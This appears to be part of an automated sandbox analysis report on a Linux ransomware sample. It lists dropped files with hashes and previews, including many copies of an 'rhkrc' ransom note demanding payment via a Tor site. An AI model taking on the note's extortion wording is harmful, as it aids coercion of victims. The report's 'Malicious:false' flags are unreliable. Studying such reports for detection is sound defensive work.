                  Encrypted:true
                  SSDEEP:1536:gk4/a5otsZl+Me3VwVZUlpfLKufrgt/4WE3FL:gx/4ot2lD3TUltLffrgt/4R
                  MD5:F8C0E114FEB79932B78140AD14C0B660
                  SHA1:DBE90DFA3F4D75E1BECF4991D435F3AEB124BC05
                  SHA-256:73CD52BC3C1DA26B271B945FD1A957FB33A88C0FF4656DF6CC996C46EA812BF6
                  SHA-512:ADAFB2AF87D367AF5F93AA37E7277E5F5469507B666CAAB57C524CCC93BBDBFCDA939C4A2C53E1C5F5AF64FFAC5970B94AC7A7877D9C1A14F3099C60BA3D3788
                  Malicious:false
                  Reputation:low
                  Preview: J}..&y..-n5..(^)..x?=.......8.4.{.Ru..g./X.Y.o.M...UX...M..._........s..8.1E.N.:....}...0A..i..?ap[.V..@.)]+s..+.l..@..Y>.C.1...DO..}..r...[.E............w...l.X,.(....0..-..q.@w.+..........M..h...ru2....w..fy$..&f@...|.[..c.......q.|qZ..(.$\ayfbowY..Dx.."..S.2..-Vm..B.i.,.~;5.s>lb%f.$..F.4..^....`Y.P..l..:y.#qgF.[c8".u&^.<V..<N..{......=..%g.....tf...W..P4...o.......W..zd.......\...0Y.q.l.....|.........".".PbU.5M....p>.H.yf.n..7.....h.......8E.DP}K1....X..%.?...g...x.yg.K[....qI.}q)........f....V..p..M.....W...[.......Om.......@.....3|.AR.=..9p..V<.JJ..c..,.)+....'o......D.-`d...b7.....G...N..*....}a?.W`9.+.................a.....E.e...l.,4....a.i.}\......EU3]Q8e.^Y1"(.2.`......-.;....V]..o.'].K.*.....hg.'..+2...c.$.aRY...u.k.0z(R....{.\.[.z..+j|.......d......OW>.<#....S....j.F{`>. ..!. @.h..rl.mk..>B}f.\.K\".WxJ..\.\.......E..n..JXez#....u[..M.........8.yV"*.2.(.b.;u...S(....vvjf..X=f..$.o...........%;..7l....@.@._..[p.X..."u..T....!}..e..3.e.Z........g#.c#y.Y6..Lz.........;..YH..d..7
                  /home/user/.config/libreoffice/4/user/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/uno_packages/cache/log.txt
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):444
                  Entropy (8bit):6.544017516835032
                  Encrypted:false
                  SSDEEP:6:dpf7AEkmLLiiepbMHGc3REDX8Ry1mXeQG00cXVU1zmhOO/EUyp6XcHX+A3oQoSte:dlb7LJAw1hE0XXlVI2DcUBqToSte
                  MD5:528DDA269D7CD2B8EF0445D7D5843B33
                  SHA1:80178574E3399A8771C6F7B21CF235B350EB8C82
                  SHA-256:E78C777BC4EEF233489991FC094F3F306283161060517481B6B0F023CB3EE8C6
                  SHA-512:64D1FC7A0A5566C5A2838F53063DD8E0E2BD8D6712DC46BD6616FD5825FFCCC1CDB296B54B57442C4CC712711E78FA61A1E7F66393EA29FFCF150C74840B2943
                  Malicious:false
                  Reputation:low
                  Preview: ..r..i...?...iK.|.p..=+..O...D......_....D7b..'K......`....r.z..R'0..-..B...Bo..-......a.....3.6.1F..g...]..H..z..t......H.j9..L.t@.Xx.+.T...-T{....l..w.l.....c!..m.R3...T\..V.HcR..7.u(N.0F.A..M..R..P.nb.f.W.|].n%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................e....Td..G7..."..?4..1......z'..+.\....V.F(.........r_.Y
                  /home/user/.config/libreoffice/4/user/uno_packages/cache/registry/com.sun.star.comp.deployment.bundle.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/uno_packages/cache/registry/com.sun.star.comp.deployment.component.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/uno_packages/cache/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/backenddb.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):367
                  Entropy (8bit):6.171901435161718
                  Encrypted:false
                  SSDEEP:6:xNW0qNUvAUK3HAqYLop9j7gK11zmhOO/EUyp6XcEpZVa5zCmo:xNzqG0QqYLopp/2DcUBvyZo
                  MD5:B43DCE22FC32BBD3FB9C25320397BB2E
                  SHA1:47FA62937F8C8791E510EBC1102FF84656DDCCE9
                  SHA-256:4E9A00814FDDF4D6967E8424772312BAAEB79499663BA319D0C05BA9D0F31503
                  SHA-512:BB645C60C79E2C6B7E08406C4D1F114693110065F18D553740EB8AAC56F7C3B98B6CA5536086DE8370221EF4BBB39C9B46896052C946A8DA8EA94AC2F539DB2A
                  Malicious:false
                  Reputation:low
                  Preview: .79...3o.|.c&+...9..=*.k.Aaq...V......qx......U>W....Ac.......g...< ....2...../.3LD~.fOjy7.8.~..m.9.....O...m.)..F.....r..T<."I%....%..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................17......[.+........x,L2.=.$....M...n..%.K...........}.T.
                  /home/user/.config/libreoffice/4/user/uno_packages/cache/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/uno_packages/cache/registry/com.sun.star.comp.deployment.executable.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/uno_packages/cache/registry/com.sun.star.comp.deployment.help.PackageRegistryBackend/backenddb.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):349
                  Entropy (8bit):6.062170717401758
                  Encrypted:false
                  SSDEEP:6:QbmoDDwMDlS6JJwV/G1zmhOO/EUyp6XcisHDrY1AUKs:5oIMRS0D2DcUBZeDrYpH
                  MD5:4F0F3CC2370A5A5CFF0849EC417F83E7
                  SHA1:C39011042C9494CFF446F213499D40A88EABAA89
                  SHA-256:A6A00E0E3AA0ADA9BF8346CED664F821C49D2B62576CD87303FB9898A09C3D6C
                  SHA-512:0A3858611AAF8AD70DF93E49AB3479B0BE31626F6FB83041B1B89043253D8E367648C233CD7F1CBD7E8EC30CF2D13B9C632328E1644C8E15FEB033BB0F58E8F4
                  Malicious:false
                  Reputation:low
                  Preview: .b....m.`q.J...!.^}.B....RZB.o..Q......U.!N2l...r.`5.zA..].W...$...^)..C.!.&H.Y=...=...o..k.V....|.k.?.....{w.x.."...%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................R+C.z.&X.l..........'........J.2.....K.9v.............Y
                  /home/user/.config/libreoffice/4/user/uno_packages/cache/registry/com.sun.star.comp.deployment.help.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/uno_packages/cache/registry/com.sun.star.comp.deployment.script.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/uno_packages/cache/registry/com.sun.star.comp.deployment.sfwk.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/uno_packages/cache/registry/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/uno_packages/cache/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/uno_packages/cache/uno_packages/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/uno_packages/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/pulse/cookie
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):488
                  Entropy (8bit):6.733120792669135
                  Encrypted:false
                  SSDEEP:6:iENR6zDo7JknsHN7B7Lp4mEgBI8X6h7Ycr11zmhOO/EUyp6Xc4zABUfQf:dNCDPn4Vvp44Ixh8crL2DcUBfsD
                  MD5:7CED5E9FB1779CE2C5CFC5647982ED02
                  SHA1:2A28B60D18AE48CE156F1D164B075F9EFFDFC3B4
                  SHA-256:8FF83BACF0D968C7215FDACBB8178E83671474E2825CA2394222879D6FB704DF
                  SHA-512:6C3CD52628AE7CD6B96E713763982C47094F4516EBF504F33C40F8CFAC0A33178FF6885851540946F18E94207227638D4700398AF96004FFB4715572DCB4CE6E
                  Malicious:false
                  Reputation:low
                  Preview: b..{.9l.....E..,.h.y/.C..<.qZL*.....M........,....j.....E.....T....(..v......+.....z.&@A.l...#..].U..(.......3.?..L.e..;...|...W.. {..........^0.B..Y~...K..|....W.8.\..aZ...u.....s..q..hW!.....S.k...?.".e....[6?=.......M..2.\.),x..uH.}....$..9aXi..G3.(....%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..............................................................................................P.Q.....G.....c.-..(.._D.hF.......Vx.............3
                  /home/user/.config/pulse/f0b45546524a75b2e6e8e8a55aab94da-card-database.tdb
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):45288
                  Entropy (8bit):7.994744920740894
                  Encrypted:true
                  SSDEEP:768:0xTuyJLS6qvfj52Q1Wem6DAHxp8iqNvDnbjjGr3MWzCnGL8w4mO6tFFf+Sxz:iTr4vLFWem6D68iqNvzbjqr3MefL8wQA
                  MD5:B76177EBA4C82CA344A9084034EC891A
                  SHA1:13D9BFBF2F85421B0BA0AAE86D9C4B3EA8BD07D1
                  SHA-256:CF114BEC9A48CE6A73101B8C2DDADE45E5CA5D2FBC30FFA800FAE83B90AB9409
                  SHA-512:F39774A9D83118C545BC07CBE4CAA1CA787611E0EC4421CC52AA05D789F4E1EBBF4446A45F8EAF4FB8C4C1D0EC5F3132BA52B1C217B41B37424ED1D5778B53B3
                  Malicious:false
                  Reputation:low
